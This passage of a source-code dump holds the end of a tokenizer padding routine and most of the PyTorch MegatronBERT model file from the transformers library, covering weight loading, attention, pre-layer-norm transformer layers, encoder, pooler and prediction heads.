                This is especially useful to enable the use of Tensor Core on NVIDIA hardware with compute capability
                `>= 7.5` (Volta).
            return_attention_mask:
                (optional) Set to False to avoid returning attention mask (default: set to model specifics)
        """
        # Load from model defaults
        if return_attention_mask is None:
            return_attention_mask = "attention_mask" in self.model_input_names
        # The first model input name (typically "input_ids") defines the reference length.
        required_input = encoded_inputs[self.model_input_names[0]]
        if padding_strategy == PaddingStrategy.LONGEST:
            max_length = len(required_input)
        # Round the target length up to the next multiple when requested.
        if max_length is not None and pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
            max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
        needs_to_be_padded = padding_strategy != PaddingStrategy.DO_NOT_PAD and len(required_input) != max_length
        # Initialize attention mask if not present.
        if return_attention_mask and "attention_mask" not in encoded_inputs:
            encoded_inputs["attention_mask"] = [1] * len(required_input)
        if needs_to_be_padded:
            difference = max_length - len(required_input)
            # Each padded field uses its own filler: 0 for the attention mask,
            # pad_token_type_id for token type ids, pad_token_box for bboxes,
            # pad_token_label for labels, 1 for the special-tokens mask.
            if self.padding_side == "right":
                if return_attention_mask:
                    encoded_inputs["attention_mask"] = encoded_inputs["attention_mask"] + [0] * difference
                if "token_type_ids" in encoded_inputs:
                    encoded_inputs["token_type_ids"] = (
                        encoded_inputs["token_type_ids"] + [self.pad_token_type_id] * difference
                    )
                if "bbox" in encoded_inputs:
                    encoded_inputs["bbox"] = encoded_inputs["bbox"] + [self.pad_token_box] * difference
                if "labels" in encoded_inputs:
                    encoded_inputs["labels"] = encoded_inputs["labels"] + [self.pad_token_label] * difference
                if "special_tokens_mask" in encoded_inputs:
                    encoded_inputs["special_tokens_mask"] = encoded_inputs["special_tokens_mask"] + [1] * difference
                encoded_inputs[self.model_input_names[0]] = required_input + [self.pad_token_id] * difference
            elif self.padding_side == "left":
                if return_attention_mask:
                    encoded_inputs["attention_mask"] = [0] * difference + encoded_inputs["attention_mask"]
                if "token_type_ids" in encoded_inputs:
                    encoded_inputs["token_type_ids"] = [self.pad_token_type_id] * difference + encoded_inputs[
                        "token_type_ids"
                    ]
                if "bbox" in encoded_inputs:
                    encoded_inputs["bbox"] = [self.pad_token_box] * difference + encoded_inputs["bbox"]
                if "labels" in encoded_inputs:
                    encoded_inputs["labels"] = [self.pad_token_label] * difference + encoded_inputs["labels"]
                if "special_tokens_mask" in encoded_inputs:
                    encoded_inputs["special_tokens_mask"] = [1] * difference + encoded_inputs["special_tokens_mask"]
                encoded_inputs[self.model_input_names[0]] = [self.pad_token_id] * difference + required_input
            else:
                raise ValueError("Invalid padding strategy:" + str(self.padding_side))
        return encoded_inputs
|
27182812/ChatGLM-LLaMA-chinese-insturct | 83,575 | src/transformers/models/megatron_bert/modeling_megatron_bert.py | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018-2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch MegatronBERT model."""
import math
import os
import warnings
from dataclasses import dataclass
from typing import Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from ...activations import ACT2FN
from ...modeling_outputs import (
BaseModelOutputWithPastAndCrossAttentions,
BaseModelOutputWithPoolingAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
MaskedLMOutput,
MultipleChoiceModelOutput,
NextSentencePredictorOutput,
QuestionAnsweringModelOutput,
SequenceClassifierOutput,
TokenClassifierOutput,
)
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import apply_chunking_to_forward, find_pruneable_heads_and_indices, prune_linear_layer
from ...utils import (
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_megatron_bert import MegatronBertConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "MegatronBertConfig"
_CHECKPOINT_FOR_DOC = "nvidia/megatron-bert-cased-345m"
MEGATRON_BERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"nvidia/megatron-bert-cased-345m",
# See all MegatronBERT models at https://huggingface.co/models?filter=megatron_bert
]
def load_tf_weights_in_megatron_bert(model, config, tf_checkpoint_path):
    """Load tf checkpoints in a pytorch model.

    Each TF variable's slash-separated scope name is walked segment by segment
    to locate the matching attribute on `model`, then the numpy array is
    copied into that parameter in place.

    Args:
        model: Target PyTorch model whose parameters are overwritten.
        config: Unused here; kept for signature parity with the other
            `load_tf_weights_in_*` loaders.
        tf_checkpoint_path: Path to the TensorFlow checkpoint file.

    Returns:
        The same `model` instance with the loaded weights.

    Raises:
        ValueError: If a checkpoint array's shape does not match the target
            parameter's shape.
    """
    try:
        import re
        import numpy as np
        import tensorflow as tf
    except ImportError:
        logger.error(
            "Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
            "https://www.tensorflow.org/install/ for installation instructions."
        )
        raise
    tf_path = os.path.abspath(tf_checkpoint_path)
    logger.info("Converting TensorFlow checkpoint from {}".format(tf_path))
    # Load weights from TF model
    init_vars = tf.train.list_variables(tf_path)
    names = []
    arrays = []
    for name, shape in init_vars:
        logger.info(f"Loading TF weight {name} with shape {shape}")
        array = tf.train.load_variable(tf_path, name)
        names.append(name)
        arrays.append(array)
    for name, array in zip(names, arrays):
        name = name.split("/")
        # adam_v and adam_m are variables used in AdamWeightDecayOptimizer to calculated m and v
        # which are not required for using pretrained model
        if any(
            n in ["adam_v", "adam_m", "AdamWeightDecayOptimizer", "AdamWeightDecayOptimizer_1", "global_step"]
            for n in name
        ):
            logger.info(f"Skipping {'/'.join(name)}")
            continue
        pointer = model
        for m_name in name:
            # Scope segments like "layer_3" split into ("layer", "3") so the
            # numeric part can index into a ModuleList below.
            if re.fullmatch(r"[A-Za-z]+_\d+", m_name):
                scope_names = re.split(r"_(\d+)", m_name)
            else:
                scope_names = [m_name]
            # Map TF naming conventions onto PyTorch attribute names.
            if scope_names[0] == "kernel" or scope_names[0] == "gamma":
                pointer = getattr(pointer, "weight")
            elif scope_names[0] == "output_bias" or scope_names[0] == "beta":
                pointer = getattr(pointer, "bias")
            elif scope_names[0] == "output_weights":
                pointer = getattr(pointer, "weight")
            elif scope_names[0] == "squad":
                pointer = getattr(pointer, "classifier")
            else:
                try:
                    pointer = getattr(pointer, scope_names[0])
                except AttributeError:
                    # NOTE(review): this `continue` only skips the current
                    # segment of the *inner* loop, so later segments are still
                    # resolved against the stale `pointer` — presumably the
                    # intent was to skip the whole variable; confirm upstream.
                    logger.info(f"Skipping {'/'.join(name)}")
                    continue
            if len(scope_names) >= 2:
                num = int(scope_names[1])
                pointer = pointer[num]
        if m_name[-11:] == "_embeddings":
            pointer = getattr(pointer, "weight")
        elif m_name == "kernel":
            # TF stores dense kernels transposed relative to torch's nn.Linear.
            array = np.transpose(array)
        if pointer.shape != array.shape:
            raise ValueError(f"Pointer shape {pointer.shape} and array shape {array.shape} mismatched")
        logger.info("Initialize PyTorch weight {}".format(name))
        pointer.data = torch.from_numpy(array)
    return model
class MegatronBertEmbeddings(nn.Module):
    """Token, position and segment embeddings for MegatronBert.

    Unlike standard BERT embeddings there is no LayerNorm here: Megatron
    applies layer norm inside each transformer layer (after this dropout),
    so this module only sums the embedding tables and applies dropout.
    """

    def __init__(self, config):
        super().__init__()
        self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
        self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
        self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        # Contiguous (1, max_position_embeddings) index row, serialized with the
        # model, used to slice out default position ids in forward().
        self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
        self.position_embedding_type = getattr(config, "position_embedding_type", "absolute")

    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        inputs_embeds: Optional[torch.LongTensor] = None,
        past_key_values_length: int = 0,
    ) -> torch.Tensor:
        """Sum word, segment and (if absolute) position embeddings, then apply dropout."""
        shape = input_ids.size() if input_ids is not None else inputs_embeds.size()[:-1]
        seq_len = shape[1]
        if position_ids is None:
            position_ids = self.position_ids[:, past_key_values_length : past_key_values_length + seq_len]
        if token_type_ids is None:
            token_type_ids = torch.zeros(shape, dtype=torch.long, device=self.position_ids.device)
        if inputs_embeds is None:
            inputs_embeds = self.word_embeddings(input_ids)
        out = inputs_embeds + self.token_type_embeddings(token_type_ids)
        if self.position_embedding_type == "absolute":
            out = out + self.position_embeddings(position_ids)
        # Megatron's layer norm is applied after this dropout, inside each layer.
        return self.dropout(out)
# Copied from transformers.models.bert.modeling_bert.BertSelfAttention with Bert->MegatronBert
class MegatronBertSelfAttention(nn.Module):
    """Multi-head self-attention, also usable as cross-attention in a decoder.

    Identical to BERT's self-attention; Megatron's different layer-norm
    placement is handled by the enclosing MegatronBertAttention module.
    """

    def __init__(self, config, position_embedding_type=None):
        super().__init__()
        if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
            raise ValueError(
                f"The hidden size ({config.hidden_size}) is not a multiple of the number of attention "
                f"heads ({config.num_attention_heads})"
            )
        self.num_attention_heads = config.num_attention_heads
        self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
        self.all_head_size = self.num_attention_heads * self.attention_head_size
        self.query = nn.Linear(config.hidden_size, self.all_head_size)
        self.key = nn.Linear(config.hidden_size, self.all_head_size)
        self.value = nn.Linear(config.hidden_size, self.all_head_size)
        self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
        # "absolute" (default) adds nothing here; "relative_key"/"relative_key_query"
        # add learned distance embeddings to the attention scores in forward().
        self.position_embedding_type = position_embedding_type or getattr(
            config, "position_embedding_type", "absolute"
        )
        if self.position_embedding_type == "relative_key" or self.position_embedding_type == "relative_key_query":
            self.max_position_embeddings = config.max_position_embeddings
            self.distance_embedding = nn.Embedding(2 * config.max_position_embeddings - 1, self.attention_head_size)
        self.is_decoder = config.is_decoder

    def transpose_for_scores(self, x: torch.Tensor) -> torch.Tensor:
        # (batch, seq, all_head_size) -> (batch, num_heads, seq, head_size)
        new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
        x = x.view(new_x_shape)
        return x.permute(0, 2, 1, 3)

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.FloatTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        encoder_hidden_states: Optional[torch.FloatTensor] = None,
        encoder_attention_mask: Optional[torch.FloatTensor] = None,
        past_key_value: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,
        output_attentions: Optional[bool] = False,
    ) -> Tuple[torch.Tensor]:
        """Return (context_layer[, attention_probs][, past_key_value]) depending on flags."""
        mixed_query_layer = self.query(hidden_states)
        # If this is instantiated as a cross-attention module, the keys
        # and values come from an encoder; the attention mask needs to be
        # such that the encoder's padding tokens are not attended to.
        is_cross_attention = encoder_hidden_states is not None
        if is_cross_attention and past_key_value is not None:
            # reuse k,v, cross_attentions
            key_layer = past_key_value[0]
            value_layer = past_key_value[1]
            attention_mask = encoder_attention_mask
        elif is_cross_attention:
            key_layer = self.transpose_for_scores(self.key(encoder_hidden_states))
            value_layer = self.transpose_for_scores(self.value(encoder_hidden_states))
            attention_mask = encoder_attention_mask
        elif past_key_value is not None:
            key_layer = self.transpose_for_scores(self.key(hidden_states))
            value_layer = self.transpose_for_scores(self.value(hidden_states))
            key_layer = torch.cat([past_key_value[0], key_layer], dim=2)
            value_layer = torch.cat([past_key_value[1], value_layer], dim=2)
        else:
            key_layer = self.transpose_for_scores(self.key(hidden_states))
            value_layer = self.transpose_for_scores(self.value(hidden_states))
        query_layer = self.transpose_for_scores(mixed_query_layer)
        use_cache = past_key_value is not None
        if self.is_decoder:
            # if cross_attention save Tuple(torch.Tensor, torch.Tensor) of all cross attention key/value_states.
            # Further calls to cross_attention layer can then reuse all cross-attention
            # key/value_states (first "if" case)
            # if uni-directional self-attention (decoder) save Tuple(torch.Tensor, torch.Tensor) of
            # all previous decoder key/value_states. Further calls to uni-directional self-attention
            # can concat previous decoder key/value_states to current projected key/value_states (third "elif" case)
            # if encoder bi-directional self-attention `past_key_value` is always `None`
            past_key_value = (key_layer, value_layer)
        # Take the dot product between "query" and "key" to get the raw attention scores.
        attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
        if self.position_embedding_type == "relative_key" or self.position_embedding_type == "relative_key_query":
            query_length, key_length = query_layer.shape[2], key_layer.shape[2]
            if use_cache:
                # With a cache only the newest query position is present.
                position_ids_l = torch.tensor(key_length - 1, dtype=torch.long, device=hidden_states.device).view(
                    -1, 1
                )
            else:
                position_ids_l = torch.arange(query_length, dtype=torch.long, device=hidden_states.device).view(-1, 1)
            position_ids_r = torch.arange(key_length, dtype=torch.long, device=hidden_states.device).view(1, -1)
            distance = position_ids_l - position_ids_r
            # Shift signed distances into the [0, 2*max-2] embedding index range.
            positional_embedding = self.distance_embedding(distance + self.max_position_embeddings - 1)
            positional_embedding = positional_embedding.to(dtype=query_layer.dtype)  # fp16 compatibility
            if self.position_embedding_type == "relative_key":
                relative_position_scores = torch.einsum("bhld,lrd->bhlr", query_layer, positional_embedding)
                attention_scores = attention_scores + relative_position_scores
            elif self.position_embedding_type == "relative_key_query":
                relative_position_scores_query = torch.einsum("bhld,lrd->bhlr", query_layer, positional_embedding)
                relative_position_scores_key = torch.einsum("bhrd,lrd->bhlr", key_layer, positional_embedding)
                attention_scores = attention_scores + relative_position_scores_query + relative_position_scores_key
        attention_scores = attention_scores / math.sqrt(self.attention_head_size)
        if attention_mask is not None:
            # Apply the attention mask is (precomputed for all layers in MegatronBertModel forward() function)
            attention_scores = attention_scores + attention_mask
        # Normalize the attention scores to probabilities.
        attention_probs = nn.functional.softmax(attention_scores, dim=-1)
        # This is actually dropping out entire tokens to attend to, which might
        # seem a bit unusual, but is taken from the original Transformer paper.
        attention_probs = self.dropout(attention_probs)
        # Mask heads if we want to
        if head_mask is not None:
            attention_probs = attention_probs * head_mask
        context_layer = torch.matmul(attention_probs, value_layer)
        # (batch, num_heads, seq, head_size) -> (batch, seq, all_head_size)
        context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
        new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
        context_layer = context_layer.view(new_context_layer_shape)
        outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
        if self.is_decoder:
            outputs = outputs + (past_key_value,)
        return outputs
# Variant of BertSelfOutput without the LayerNorm: MegatronBertAttention
# normalizes its *input* instead, so this module only projects, drops out,
# and adds the residual.
class MegatronBertSelfOutput(nn.Module):
    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states: torch.Tensor, residual: torch.Tensor) -> torch.Tensor:
        """Project the attention context, apply dropout, and add the residual."""
        projected = self.dropout(self.dense(hidden_states))
        return residual + projected
# Based transformers.models.bert.modeling_bert.BertAttention. Added LayerNorm.
class MegatronBertAttention(nn.Module):
    """Pre-LN attention block: layer-norm the input, attend, then add the
    *un-normalized* input back as the residual (Megatron placement)."""

    def __init__(self, config):
        super().__init__()
        self.ln = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.self = MegatronBertSelfAttention(config)
        self.output = MegatronBertSelfOutput(config)
        self.pruned_heads = set()

    def prune_heads(self, heads):
        """Remove the attention heads with the given indices in place."""
        if len(heads) == 0:
            return
        heads, index = find_pruneable_heads_and_indices(
            heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads
        )
        # Prune linear layers
        self.self.query = prune_linear_layer(self.self.query, index)
        self.self.key = prune_linear_layer(self.self.key, index)
        self.self.value = prune_linear_layer(self.self.value, index)
        self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
        # Update hyper params and store pruned heads
        self.self.num_attention_heads = self.self.num_attention_heads - len(heads)
        self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads
        self.pruned_heads = self.pruned_heads.union(heads)

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.FloatTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        encoder_hidden_states: Optional[torch.FloatTensor] = None,
        encoder_attention_mask: Optional[torch.FloatTensor] = None,
        past_key_value: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,
        output_attentions: Optional[bool] = False,
    ) -> Tuple[torch.Tensor]:
        ln_outputs = self.ln(hidden_states)
        self_outputs = self.self(
            ln_outputs,
            attention_mask,
            head_mask,
            encoder_hidden_states,
            encoder_attention_mask,
            past_key_value,
            output_attentions,
        )
        # Residual uses the raw (pre-layer-norm) hidden states.
        attention_output = self.output(self_outputs[0], hidden_states)
        outputs = (attention_output,) + self_outputs[1:]  # add attentions if we output them
        return outputs
class MegatronBertIntermediate(nn.Module):
    """Position-wise feed-forward expansion: hidden_size -> intermediate_size, then activation."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
        # config.hidden_act is either an activation name (looked up in ACT2FN) or a callable.
        self.intermediate_act_fn = (
            ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
        )

    def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
        """Expand to the intermediate size and apply the activation."""
        return self.intermediate_act_fn(self.dense(hidden_states))
# Feed-forward output projection; the LayerNorm that BertOutput carries lives
# in MegatronBertLayer instead, so this is projection + dropout + residual only.
class MegatronBertOutput(nn.Module):
    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
        """Project back to hidden_size, drop out, and add the residual `input_tensor`."""
        return input_tensor + self.dropout(self.dense(hidden_states))
# Based on transformers.models.bert.modeling_bert.BertLayer. Added LayerNorm.
class MegatronBertLayer(nn.Module):
    """One transformer layer with Megatron's pre-layer-norm placement.

    The attention block layer-norms its own input; `self.ln` here normalizes
    the attention output before the feed-forward sub-block (see
    feed_forward_chunk).
    """

    def __init__(self, config):
        super().__init__()
        self.chunk_size_feed_forward = config.chunk_size_feed_forward
        self.seq_len_dim = 1
        self.attention = MegatronBertAttention(config)
        self.is_decoder = config.is_decoder
        self.add_cross_attention = config.add_cross_attention
        if self.add_cross_attention:
            if not self.is_decoder:
                raise TypeError(f"{self} should be used as a decoder model if cross attention is added")
            self.crossattention = MegatronBertAttention(config)
        self.ln = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.intermediate = MegatronBertIntermediate(config)
        self.output = MegatronBertOutput(config)

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.FloatTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        encoder_hidden_states: Optional[torch.FloatTensor] = None,
        encoder_attention_mask: Optional[torch.FloatTensor] = None,
        past_key_value: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,
        output_attentions: Optional[bool] = False,
    ) -> Tuple[torch.Tensor]:
        """Return (layer_output, *attention_outputs[, present_key_value])."""
        # decoder uni-directional self-attention cached key/values tuple is at positions 1,2
        self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None
        self_attention_outputs = self.attention(
            hidden_states,
            attention_mask,
            head_mask,
            output_attentions=output_attentions,
            past_key_value=self_attn_past_key_value,
        )
        attention_output = self_attention_outputs[0]
        # if decoder, the last output is tuple of self-attn cache
        if self.is_decoder:
            outputs = self_attention_outputs[1:-1]
            present_key_value = self_attention_outputs[-1]
        else:
            outputs = self_attention_outputs[1:]  # add self attentions if we output attention weights
        cross_attn_present_key_value = None
        if self.is_decoder and encoder_hidden_states is not None:
            if not hasattr(self, "crossattention"):
                raise AttributeError(
                    f"If `encoder_hidden_states` are passed, {self} has to be instantiated with cross-attention layers"
                    " by setting `config.add_cross_attention=True`"
                )
            # cross_attn cached key/values tuple is at positions 3,4 of past_key_value tuple
            cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None
            cross_attention_outputs = self.crossattention(
                attention_output,
                attention_mask,
                head_mask,
                encoder_hidden_states,
                encoder_attention_mask,
                cross_attn_past_key_value,
                output_attentions,
            )
            attention_output = cross_attention_outputs[0]
            outputs = outputs + cross_attention_outputs[1:-1]  # add cross attentions if we output attention weights
            # add cross-attn cache to positions 3,4 of present_key_value tuple
            cross_attn_present_key_value = cross_attention_outputs[-1]
            present_key_value = present_key_value + cross_attn_present_key_value
        # Chunk the feed-forward pass along the sequence dimension to bound peak memory.
        layer_output = apply_chunking_to_forward(
            self.feed_forward_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output
        )
        outputs = (layer_output,) + outputs
        # if decoder, return the attn key/values as the last output
        if self.is_decoder:
            outputs = outputs + (present_key_value,)
        return outputs

    def feed_forward_chunk(self, attention_output):
        # Pre-LN feed-forward: normalize, expand, then project back with a
        # residual add against the un-normalized attention output.
        ln_output = self.ln(attention_output)
        intermediate_output = self.intermediate(ln_output)
        layer_output = self.output(intermediate_output, attention_output)
        return layer_output
class MegatronBertEncoder(nn.Module):
    """Stack of MegatronBertLayer modules followed by a final LayerNorm.

    Because each layer norms its own input (pre-LN), the last hidden state
    of the stack is un-normalized until `self.ln` is applied at the end.
    """

    def __init__(self, config):
        super().__init__()
        self.config = config
        self.layer = nn.ModuleList([MegatronBertLayer(config) for _ in range(config.num_hidden_layers)])
        # The final layer norm. We removed the 1st LN, moved LN to each hidden layer and this one
        # is simply the final LN (Transformer's BERT has it attached to each hidden layer).
        self.ln = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.gradient_checkpointing = False

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.FloatTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        encoder_hidden_states: Optional[torch.FloatTensor] = None,
        encoder_attention_mask: Optional[torch.FloatTensor] = None,
        past_key_values: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,
        use_cache: Optional[bool] = None,
        output_attentions: Optional[bool] = False,
        output_hidden_states: Optional[bool] = False,
        return_dict: Optional[bool] = True,
    ) -> Union[Tuple, BaseModelOutputWithPastAndCrossAttentions]:
        """Run all layers, optionally collecting hidden states / attentions / cache."""
        if self.gradient_checkpointing and self.training:
            # Checkpointing recomputes activations in backward; caching key/values
            # would be discarded, so the two options are mutually exclusive.
            if use_cache:
                logger.warning_once(
                    "`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..."
                )
                use_cache = False
        all_hidden_states = () if output_hidden_states else None
        all_self_attentions = () if output_attentions else None
        all_cross_attentions = () if output_attentions and self.config.add_cross_attention else None
        next_decoder_cache = () if use_cache else None
        for i, layer_module in enumerate(self.layer):
            if output_hidden_states:
                all_hidden_states = all_hidden_states + (hidden_states,)
            layer_head_mask = head_mask[i] if head_mask is not None else None
            past_key_value = past_key_values[i] if past_key_values is not None else None
            if self.gradient_checkpointing and self.training:

                def create_custom_forward(module):
                    # Closure so the non-tensor args survive the checkpoint boundary.
                    def custom_forward(*inputs):
                        return module(*inputs, past_key_value, output_attentions)

                    return custom_forward

                layer_outputs = torch.utils.checkpoint.checkpoint(
                    create_custom_forward(layer_module),
                    hidden_states,
                    attention_mask,
                    layer_head_mask,
                    encoder_hidden_states,
                    encoder_attention_mask,
                )
            else:
                layer_outputs = layer_module(
                    hidden_states,
                    attention_mask,
                    layer_head_mask,
                    encoder_hidden_states,
                    encoder_attention_mask,
                    past_key_value,
                    output_attentions,
                )
            # Because we moved the layer-norm at the end of the hidden layer, we have non-normali-
            # zed data here. If that's really needed, we must apply LN to match Transformer's BERT.
            hidden_states = layer_outputs[0]
            if use_cache:
                next_decoder_cache += (layer_outputs[-1],)
            if output_attentions:
                all_self_attentions = all_self_attentions + (layer_outputs[1],)
                if self.config.add_cross_attention:
                    all_cross_attentions = all_cross_attentions + (layer_outputs[2],)
        # Finalize the hidden states.
        hidden_states = self.ln(hidden_states)
        if output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)
        if not return_dict:
            return tuple(
                v
                for v in [
                    hidden_states,
                    next_decoder_cache,
                    all_hidden_states,
                    all_self_attentions,
                    all_cross_attentions,
                ]
                if v is not None
            )
        return BaseModelOutputWithPastAndCrossAttentions(
            last_hidden_state=hidden_states,
            past_key_values=next_decoder_cache,
            hidden_states=all_hidden_states,
            attentions=all_self_attentions,
            cross_attentions=all_cross_attentions,
        )
class MegatronBertPooler(nn.Module):
    """Pools the sequence by passing the first ([CLS]) token through a tanh-activated dense layer."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        self.activation = nn.Tanh()

    def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
        """Return the pooled representation of shape (batch, hidden_size)."""
        cls_state = hidden_states[:, 0]
        return self.activation(self.dense(cls_state))
class MegatronBertPredictionHeadTransform(nn.Module):
    """Dense + activation + LayerNorm applied to encoder output before the LM decoder."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        # config.hidden_act is either an activation name (looked up in ACT2FN) or a callable.
        self.transform_act_fn = (
            ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
        )
        self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)

    def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
        """Transform hidden states; output keeps shape (batch, seq, hidden_size)."""
        return self.LayerNorm(self.transform_act_fn(self.dense(hidden_states)))
class MegatronBertLMPredictionHead(nn.Module):
    """Masked-LM head: transform the hidden states, then decode to vocabulary logits.

    The decoder weight is intended to be tied to the input embeddings; a
    separate per-token bias is kept and linked onto the decoder so that
    `resize_token_embeddings` resizes both together.
    """

    def __init__(self, config):
        super().__init__()
        self.transform = MegatronBertPredictionHeadTransform(config)
        self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
        self.bias = nn.Parameter(torch.zeros(config.vocab_size))
        # Link the two so the bias is resized together with the decoder weights.
        self.decoder.bias = self.bias

    def forward(self, hidden_states):
        return self.decoder(self.transform(hidden_states))
class MegatronBertOnlyMLMHead(nn.Module):
    """Wraps the masked-LM prediction head as the model's only output head."""

    def __init__(self, config):
        super().__init__()
        self.predictions = MegatronBertLMPredictionHead(config)

    def forward(self, sequence_output: torch.Tensor) -> torch.Tensor:
        """Return vocabulary logits for every position of `sequence_output`."""
        return self.predictions(sequence_output)
class MegatronBertOnlyNSPHead(nn.Module):
    """Binary next-sentence-prediction head over the pooled output."""

    def __init__(self, config):
        super().__init__()
        self.seq_relationship = nn.Linear(config.hidden_size, 2)

    def forward(self, pooled_output):
        """Return (batch, 2) logits for is-next / not-next."""
        return self.seq_relationship(pooled_output)
class MegatronBertPreTrainingHeads(nn.Module):
    """Joint pre-training heads: masked-LM logits plus next-sentence logits."""

    def __init__(self, config):
        super().__init__()
        self.predictions = MegatronBertLMPredictionHead(config)
        self.seq_relationship = nn.Linear(config.hidden_size, 2)

    def forward(self, sequence_output, pooled_output):
        """Return (mlm_logits, nsp_logits)."""
        return self.predictions(sequence_output), self.seq_relationship(pooled_output)
class MegatronBertPreTrainedModel(PreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """

    config_class = MegatronBertConfig
    load_tf_weights = load_tf_weights_in_megatron_bert
    base_model_prefix = "bert"
    supports_gradient_checkpointing = True
    _keys_to_ignore_on_load_missing = [r"position_ids"]

    def _init_weights(self, module):
        """Initialize the weights"""
        if isinstance(module, nn.LayerNorm):
            module.weight.data.fill_(1.0)
            module.bias.data.zero_()
            return
        if isinstance(module, (nn.Linear, nn.Embedding)):
            # The TF original uses truncated_normal; plain normal is the accepted
            # substitute (cf https://github.com/pytorch/pytorch/pull/5617).
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
            if isinstance(module, nn.Linear) and module.bias is not None:
                module.bias.data.zero_()

    def _set_gradient_checkpointing(self, module, value=False):
        # Only the encoder supports checkpointing; all other submodules are ignored.
        if isinstance(module, MegatronBertEncoder):
            module.gradient_checkpointing = value
@dataclass
# Copied from transformers.models.bert.modeling_bert.BertForPreTrainingOutput with Bert->MegatronBert
class MegatronBertForPreTrainingOutput(ModelOutput):
    """
    Output type of [`MegatronBertForPreTraining`].
    Args:
        loss (*optional*, returned when `labels` is provided, `torch.FloatTensor` of shape `(1,)`):
            Total loss as the sum of the masked language modeling loss and the next sequence prediction
            (classification) loss.
        prediction_logits (`torch.FloatTensor` of shape `(batch_size, sequence_length, config.vocab_size)`):
            Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
        seq_relationship_logits (`torch.FloatTensor` of shape `(batch_size, 2)`):
            Prediction scores of the next sequence prediction (classification) head (scores of True/False continuation
            before SoftMax).
        hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
